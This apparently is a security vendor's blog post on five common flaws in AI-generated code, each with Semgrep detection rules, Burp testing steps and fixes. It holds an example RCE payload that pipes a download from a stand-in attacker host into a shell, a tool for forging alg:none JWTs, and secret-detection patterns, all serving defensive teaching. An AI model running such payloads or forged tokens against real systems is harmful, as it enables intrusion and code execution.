Application Security LLM Security OWASP Offensive Security

5 Vulnerabilities in Every Vibe-Coded App

Alibha · May 29, 2026 · 13 min read

TL;DR

✓"Vibe coding" means shipping software an AI assistant generated from natural-language prompts. It produces functional apps fast, but the same generators repeat a predictable set of security defects. Vibe coding security is mostly about catching those patterns before they reach production.
✓Five flaws show up in nearly every vibe-coded codebase we review: missing authorization on generated endpoints, hardcoded or copy-pasted secrets, weak JWT validation, IDOR-by-default object access, and eval-pattern remote code execution.
✓Each one maps to a known standard: OWASP Top 10 (A01, A02, A03, A07) plus CWE-862, CWE-798, CWE-287, CWE-347, CWE-639, and CWE-94. That makes them detectable with Semgrep static rules and confirmable with Burp Suite.
✓The root cause? LLMs optimize for "make the feature work," not "make the feature safe." The happy path compiles. The abuse path never gets written.
✓This post gives you the how-it-happens, the detection query, and the fix for all five, plus the selection criteria and a comparison table you can drop straight into a code review checklist.

What is "vibe coding" and why does it create security debt?

Vibe coding means building software by describing what you want to an AI assistant and accepting most of what it generates without hand-auditing every line. The security debt traces to one structural fact: large language models are trained to satisfy the functional request, not the threat model. The feature works on the first try, so it ships. The access-control check, the secret rotation, the ownership assertion, and the input sanitizer that a senior engineer would have added? Simply absent.

This isn't a knock on any specific model. It's a property of how generation works. Ask for "an endpoint that returns a user's invoices" and the model produces exactly that. It won't infer that "a user's invoices" implies "and nobody else's," because that constraint lived in your head, not in the prompt. So vibe-coded apps fail in the same five ways over and over. That's actually good news. Predictable failure is detectable failure.

How did we choose these five vulnerabilities?

We picked the five flaws that are both high-frequency in generated code and high-impact when exploited. The criteria were deliberately strict, so the list stays useful rather than exhaustive.

Frequency in generated output. It has to appear across multiple frameworks and prompt styles, not show up as a one-off.
Severity if exploited. Data exposure, account takeover, or code execution. Cosmetic issues didn't make the cut.
Maps to a recognized standard. A clear OWASP Top 10 category and CWE ID, so it's auditable and reportable.
Statically detectable. A Semgrep rule or a grep can flag candidates without running the app.
Dynamically confirmable. Burp Suite (or similar) can prove exploitability against a running instance.

Every entry below clears all five bars. Missing rate limiting and verbose error messages are real problems too, but we cut them for lower severity or weaker static signal.

Vulnerability comparison table

#	Vulnerability	OWASP Top 10	CWE	Primary detection	Confirm with
1	Missing authorization on generated endpoints	A01: Broken Access Control	CWE-862	Semgrep (route without auth decorator)	Burp Suite Repeater, unauthenticated
2	Hardcoded / copy-pasted secrets	A07: Identification & Auth Failures	CWE-798	Semgrep / git secret scan	Manual key validation against the live service
3	Weak JWT validation	A07 / A02: Cryptographic Failures	CWE-287 / CWE-347	Semgrep (verify=False, algorithms missing)	Burp + alg:none / signature-strip test
4	IDOR-by-default	A01: Broken Access Control	CWE-639	Semgrep (DB query keyed by request param only)	Burp Intruder, ID enumeration
5	Eval-pattern RCE	A03: Injection	CWE-94	Semgrep (eval, exec, Function())	Burp + sandbox payload

You can look up any of these CWEs and track their real-world exploit status in the Strobes VI CVE database, which covers 416K+ CVEs with priority scoring and threat-actor attribution.

1. Why do AI-generated endpoints ship with no authorization?

Answer first: Because the prompt asks for what the endpoint returns, never who is allowed to call it. So the model writes the route handler and the database query but omits the access-control check entirely. This is OWASP A01: Broken Access Control, classified as CWE-862 (Missing Authorization).

How it happens. You ask for "an admin route to list all users." The model emits a clean handler that queries the users table and returns JSON, then registers the route. It won't wrap it in require_admin or check request.user.role, because nothing in the prompt said it had to, and the demo works fine when you (an admin) click it. The gap only shows up when an unauthenticated or low-privilege caller hits the same path.

How to detect it. Statically, a Semgrep rule that flags route definitions lacking an auth decorator or middleware is your fastest sweep:

rules:
  - id: route-missing-auth
    languages: [python]
    message: Route handler has no authorization check
    severity: ERROR
    patterns:
      - pattern: |
          @app.route(...)
          def $F(...):
            ...
      - pattern-not: |
          @app.route(...)
          @login_required
          def $F(...):
            ...

Dynamically, replay every discovered endpoint in Burp Suite Repeater with the session cookie removed and with a low-privilege account's token. Any 200 that should have been a 401 or 403 is a confirmed finding.

The fix. Apply authorization at a choke point, not per-handler. Use a default-deny middleware or framework guard so every new route is protected unless explicitly marked public, and assert the specific permission (can_view_user) rather than just "is logged in."
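A default-deny choke point can be sketched without any particular framework. The `Router` class, the `User` type, and the `/health` and `/admin/users` paths below are hypothetical names invented for illustration; real frameworks expose their own middleware or guard hooks for the same idea. The sketch refuses to register a route that declares neither a permission nor an explicit public flag, and it checks the specific permission in one place at dispatch time.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Set, Tuple


@dataclass
class User:
    name: str
    permissions: Set[str] = field(default_factory=set)


class Forbidden(Exception):
    """Raised when the caller lacks the permission a route requires."""


class Router:
    """Toy router (hypothetical): a route must name a permission or be marked public."""

    def __init__(self) -> None:
        self._routes: Dict[str, Tuple[Callable, Optional[str]]] = {}

    def route(self, path: str, *, permission: Optional[str] = None, public: bool = False):
        # Default-deny at registration time: a route with neither a permission
        # nor an explicit public flag cannot be registered at all.
        if permission is None and not public:
            raise ValueError(f"{path}: declare permission=... or public=True")

        def register(handler: Callable) -> Callable:
            self._routes[path] = (handler, permission)
            return handler

        return register

    def dispatch(self, path: str, user: Optional[User]):
        handler, permission = self._routes[path]
        # Single choke point: the check runs here, not inside each handler.
        if permission is not None:
            if user is None or permission not in user.permissions:
                raise Forbidden(path)
        return handler(user)


router = Router()


@router.route("/health", public=True)
def health(user):
    return "ok"


@router.route("/admin/users", permission="can_view_user")
def list_users(user):
    return ["alice", "bob"]
```

With this shape, a generated handler that forgets its access rule fails at import time instead of shipping open, which is the property the fix is after.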

2. Why are hardcoded secrets so common in vibe-coded apps?

Answer first: Because the fastest way for a model to make code "run right now" is to inline the API key, database password, or signing secret directly into the source. And prompts frequently paste real credentials in for context, which the model then echoes back into the file. This is CWE-798 (Use of Hard-coded Credentials), an OWASP A07 failure.

How it happens. "Connect to Stripe and charge the card" produces a working client with sk_live_... sitting in a string literal. The same secret then gets copy-pasted across three files, because each generation is stateless. Once committed, the key lives in git history forever, even after you "remove" it in a later commit.

How to detect it. Run a secret scanner (Semgrep has a secrets ruleset; gitleaks and trufflehog work too) across both the working tree and the full git history. A quick targeted Semgrep pattern:

rules:
  - id: hardcoded-secret
    languages: [generic]
    message: Possible hardcoded secret
    severity: ERROR
    pattern-regex: '(sk_live_|AKIA|-----BEGIN (RSA|EC) PRIVATE KEY-----|password\s*=\s*["''][^"'']{8,})'

The fix. Move every secret to environment variables or a managed secrets store, scrub git history (git filter-repo), and rotate every exposed key. A leaked secret in history is a leaked secret, full stop. For team operations, keep credentials out of code paths entirely. Strobes' Credentials Vault stores the auth material an assessment needs without it ever landing in a prompt or a repo.
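As a minimal sketch of the environment-variable approach, the loader below fails fast at startup when a secret is missing rather than falling back to a literal. The variable names `STRIPE_API_KEY` and `JWT_SIGNING_KEY` and the helper names are assumptions made for the example, not part of any library.

```python
import os


class MissingSecret(RuntimeError):
    """Raised at startup when a required secret is not configured."""


def require_secret(name: str) -> str:
    # Read from the process environment. There is deliberately no default
    # value, because a default would put a credential back into source control.
    value = os.environ.get(name, "").strip()
    if not value:
        raise MissingSecret(f"environment variable {name} is not set")
    return value


def load_settings() -> dict:
    # STRIPE_API_KEY and JWT_SIGNING_KEY are hypothetical variable names.
    return {
        "stripe_api_key": require_secret("STRIPE_API_KEY"),
        "jwt_signing_key": require_secret("JWT_SIGNING_KEY"),
    }
```

Calling `load_settings()` once during application startup surfaces a missing secret immediately, instead of at the first request that needs it.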

3. What makes AI-generated JWT validation weak?

Answer first: Generated auth code routinely decodes a JWT without verifying its signature, accepts any algorithm the token claims (including alg: none), or skips expiry and audience checks. That's CWE-287 (Improper Authentication) and CWE-347 (Improper Verification of Cryptographic Signature), under OWASP A07 and A02.

How it happens. The model needs the user ID out of the token, so it reaches for the simplest call that returns the payload, often a decode with verification disabled, or one that trusts the alg header from the token itself. The login flow looks correct in testing, because you send valid tokens. An attacker sends a token with alg set to none and no signature, or takes an RS256 token and re-signs it with HS256 using the server's public key as the HMAC secret, and walks straight in.

How to detect it. Semgrep catches the common shapes:

rules:
  - id: jwt-no-verify
    languages: [python]
    message: JWT decoded without signature verification
    severity: ERROR
    patterns:
      - pattern-either:
          - pattern: jwt.decode(..., verify=False)
          - pattern: jwt.decode($T, ..., options={..., "verify_signature": False, ...})
          - pattern: jwt.decode($T, $K)   # no algorithms= pin

Confirm in Burp. Capture a valid token and replay two tampered variants: one with the header set to alg: none and the signature stripped, and one re-signed with HS256 using the server's public key as the HMAC secret. Acceptance of either variant is a critical finding.
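For the alg: none variant, the tampered token can be built with a few lines of standard-library Python and pasted into Repeater. This is a sketch for authorized testing only; `to_alg_none` and the two base64 helpers are hypothetical names introduced here.

```python
import base64
import json


def b64url_encode(raw: bytes) -> str:
    # JWTs use URL-safe base64 with the "=" padding removed.
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding that JWT encoding strips.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def to_alg_none(token: str) -> str:
    """Return the captured token with alg set to "none" and an empty signature."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    header["alg"] = "none"
    new_header = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    # The payload is reused unchanged; the trailing dot leaves the signature empty.
    return f"{new_header}.{payload_b64}."
```

A server that verifies correctly rejects the result outright, because "none" is not in its pinned algorithm list.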

The fix. Always verify the signature, pin an explicit allow-list of algorithms (never read alg from the token), and validate exp, nbf, iss, and aud. Use a maintained library's verifying API, not the raw decode.

4. Why is IDOR the default in generated CRUD code?

Answer first: Because generated database queries key off the ID in the request and nothing else (SELECT * FROM orders WHERE id = :id). So any authenticated user who changes the ID reads or edits another user's record. This is Insecure Direct Object Reference, CWE-639, under OWASP A01.

How it happens. "Let users view their order by ID" produces a query filtered only on the order ID, not on the owner of the order. The model has no concept that the current session's user must also match orders.user_id. Sequential or guessable IDs make enumeration trivial. Even UUIDs leak if they appear elsewhere in the app.

How to detect it. Statically, flag queries whose only filter is a request parameter with no tenant or owner constraint:

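rules:
  - id: idor-query-no-owner
    languages: [python]
    message: Object fetched by request ID without owner check
    severity: WARNING
    patterns:
      # Match a lookup by ID, whatever other keyword arguments are present
      - pattern: $MODEL.objects.get(..., id=$REQ, ...)
      # Drop matches that also filter on the owner in the same call
      - pattern-not: $MODEL.objects.get(..., user=$OWNER, ...)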

Dynamically, use Burp Intruder to enumerate IDs from a low-privilege account. Any record returned that belongs to another user confirms IDOR. It's also the single most common class our offensive team finds during AI-powered crawling and attack-surface discovery.

The fix. Scope every object lookup to the authenticated principal. Add AND user_id = :current_user (or the equivalent ownership or tenant filter) to the query itself, so an unauthorized ID returns "not found." Enforce it at the data-access layer, not in scattered controllers.
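A minimal sketch of an owner-scoped lookup, using the standard-library sqlite3 module and a hypothetical `orders` table whose columns are assumed for the example. The ownership filter sits in the query, so an ID that belongs to someone else is indistinguishable from an ID that does not exist.

```python
import sqlite3
from typing import Optional


def get_order(conn: sqlite3.Connection, order_id: int, current_user_id: int) -> Optional[sqlite3.Row]:
    # Both conditions are bound parameters; the owner check cannot be skipped
    # by a controller that forgets to compare user IDs afterwards.
    return conn.execute(
        "SELECT id, user_id, total FROM orders WHERE id = ? AND user_id = ?",
        (order_id, current_user_id),
    ).fetchone()


# In-memory demo data: order 1 belongs to user 10, order 2 to user 20.
conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row
conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER, total REAL)")
conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [(1, 10, 19.99), (2, 20, 5.00)])
```

Here `get_order(conn, 1, 10)` returns the row, while `get_order(conn, 1, 20)` returns `None`, which the handler can turn into a 404.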

5. How does eval-pattern code lead to remote code execution?

Answer first: When generated code passes user-controlled input into eval(), exec(), Function(), pickle.loads(), or a templating engine in an unsafe mode, an attacker can supply input that executes as code on the server. This is CWE-94 (Improper Control of Generation of Code), OWASP A03: Injection.

How it happens. "Let users enter a formula and compute the result" or "load this config dynamically" nudges the model toward the most direct tool: evaluate the string. It works for the demo input 2 + 2. It also works for __import__('os').system('curl attacker.tld | sh'). The same pattern shows up with JSON-ish parsers, YAML loaders in unsafe mode, and server-side template injection.

How to detect it. Semgrep ships rules for this. A minimal custom pass:

rules:
  - id: dangerous-eval
    languages: [python]
    message: User input may reach eval/exec/pickle
    severity: ERROR
    pattern-either:
      - pattern: eval(...)
      - pattern: exec(...)
      - pattern: pickle.loads(...)
      - pattern: yaml.load($X)   # not safe_load

Confirm with a benign canary payload in Burp (a DNS callback or a sleep) before any destructive test, and only within authorized scope.

The fix. Never evaluate untrusted input as code. Use a real parser for the data format, an expression library with a sandboxed, allow-listed grammar for formulas, yaml.safe_load instead of yaml.load, and json.loads instead of pickle.loads for deserialization. If dynamic behavior is genuinely required, run it in an isolated, least-privilege sandbox. Track known eval/code-injection CVEs in your stack through Strobes VI's supply chain tracker to catch compromised dependencies before they ship.
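For the formula case, an allow-listed grammar can be sketched with the standard-library ast module: the input is parsed, never executed, and only numeric literals and four arithmetic operators are evaluated. The name `safe_eval` and the 200-character limit are assumptions for the example; a production service would more likely use a vetted expression library.

```python
import ast
import operator

# Allow-list of operators; anything not listed here is rejected.
_BINARY = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}
_UNARY = {ast.UAdd: operator.pos, ast.USub: operator.neg}

MAX_LENGTH = 200  # arbitrary cap to keep parsing and recursion cheap


def safe_eval(expr: str):
    if len(expr) > MAX_LENGTH:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")  # parses only; nothing runs
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    return _eval(tree.body)


def _eval(node):
    # Numeric literals only; type() excludes bool, str, bytes, and None.
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BINARY:
        return _BINARY[type(node.op)](_eval(node.left), _eval(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY:
        return _UNARY[type(node.op)](_eval(node.operand))
    # Calls, names, attributes, subscripts, and everything else land here.
    raise ValueError(f"unsupported expression: {type(node).__name__}")
```

The demo input 2 + 2 still works, while the `__import__('os')` payload parses to a call node and is rejected before anything executes.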

How should teams test a vibe-coded app before shipping?

Answer first: Combine a static sweep for all five patterns with a dynamic confirmation pass on the running app, then gate releases on the results. Static analysis finds the candidates cheaply. Dynamic testing proves which ones are actually exploitable, so you fix the real risks first.

A practical pipeline looks like this:

Pre-commit / CI: run Semgrep (and a secrets scanner over full git history) on every push. Block merges on the five rule classes above. This is where a solid DevSecOps pipeline starts paying for itself.
Pre-release: run an authenticated dynamic test. At minimum that means an IDOR enumeration pass, an auth-bypass sweep of every endpoint, and a JWT tampering test, all in Burp Suite or an equivalent proxy. For a thorough methodology, follow a web application pentesting checklist.
Continuous: treat each AI-generated PR as untrusted input. The volume of generated code is the problem, so the answer is testing that keeps pace with it.
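The CI step in this pipeline can be sketched as a small gate over Semgrep's JSON report. The sketch assumes a report produced with Semgrep's `--json` output, whose `results` entries carry `check_id`, `path`, `start.line`, and `extra.severity`; the file name `report.json`, the function names, and the choice of blocking severities are assumptions. WARNING is included because the IDOR rule above is declared at that level.

```python
import json
from typing import List

# Severities that should fail the build. WARNING is included so the
# IDOR rule (declared as WARNING above) blocks merges as well.
BLOCKING_SEVERITIES = {"ERROR", "WARNING"}


def blocking_findings(report: dict) -> List[str]:
    """Return one "path:line rule-id" string per finding that should block a merge."""
    findings = []
    for result in report.get("results", []):
        severity = result.get("extra", {}).get("severity", "")
        if severity in BLOCKING_SEVERITIES:
            line = result.get("start", {}).get("line", "?")
            findings.append(f'{result.get("path", "?")}:{line} {result.get("check_id", "?")}')
    return findings


def gate(report_path: str) -> int:
    """Read a Semgrep JSON report and return a process exit code (0 = pass)."""
    with open(report_path, encoding="utf-8") as handle:
        findings = blocking_findings(json.load(handle))
    for finding in findings:
        print(finding)
    return 1 if findings else 0
```

In a pipeline, a wrapper script would call `sys.exit(gate("report.json"))` after the scan so that any blocking finding fails the job.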

That last point is why teams move from per-PR manual review to agentic testing. Strobes runs offensive testing with AI agents that crawl the live app, reason about authorization and object ownership the way a human pentester does, and confirm findings against a running instance, covering the full WSTG methodology rather than a fixed rule set. If you're shipping AI-generated code at volume, AI pentesting and pentesting-as-a-service close the gap between "it compiled" and "it's safe to ship." Our approach has one throughline: from finding to fixed.

FAQ

Is vibe coding inherently insecure? No. The generated code isn't malicious; it's incomplete. It implements the requested feature correctly and omits the security controls that were never requested. With static and dynamic testing in the pipeline, you can ship vibe-coded apps safely. Without it, they inherit a predictable set of defects.

Can a linter or Semgrep catch all five vulnerabilities? Static analysis reliably catches hardcoded secrets, eval patterns, and many missing-auth and weak-JWT cases. It's weaker on IDOR and on context-dependent authorization, because "is this the right owner check?" needs runtime context. That's why dynamic confirmation in Burp Suite (or an agentic tester) stays necessary.

Which of these is the most common in practice? Broken access control, meaning missing authorization (CWE-862) and IDOR (CWE-639) taken together. That matches A01 Broken Access Control being the top-ranked category in the OWASP Top 10:2021. Eval-pattern RCE is rarer but the highest severity when it shows up.

Do these flaws appear regardless of which AI assistant generated the code? Yes. The patterns stem from how generation prioritizes functional correctness over threat modeling, not from a specific model or tool. The frequency and shape stay consistent across assistants and frameworks.

Should I scan git history for secrets, or just the current code? Both, and history especially. A secret removed in a later commit still lives in history and is still compromised. Scan the full history, rotate every exposed key, and treat the old value as burned.

What is the single highest-payoff fix? A default-deny authorization choke point. It neutralizes most missing-authz and IDOR findings at once: every new generated route is protected unless explicitly opened, and every object lookup is scoped to the authenticated principal.

Sources

OWASP Top 10:2021 — A01 Broken Access Control, A02 Cryptographic Failures, A03 Injection, A07 Identification and Authentication Failures. https://owasp.org/Top10/
MITRE CWE — CWE-862 Missing Authorization. https://cwe.mitre.org/data/definitions/862.html
MITRE CWE — CWE-798 Use of Hard-coded Credentials. https://cwe.mitre.org/data/definitions/798.html
MITRE CWE — CWE-287 Improper Authentication; CWE-347 Improper Verification of Cryptographic Signature. https://cwe.mitre.org/data/definitions/287.html and https://cwe.mitre.org/data/definitions/347.html
MITRE CWE — CWE-639 Authorization Bypass Through User-Controlled Key (IDOR). https://cwe.mitre.org/data/definitions/639.html
MITRE CWE — CWE-94 Improper Control of Generation of Code (Code Injection). https://cwe.mitre.org/data/definitions/94.html
OWASP Web Security Testing Guide (WSTG). https://owasp.org/www-project-web-security-testing-guide/

Written by the Strobes Security Research Team — Strobes' offensive security group, combining 50+ certified researchers with the Strobes AI agent stack to test web, API, and AI-driven applications against the full OWASP WSTG methodology.
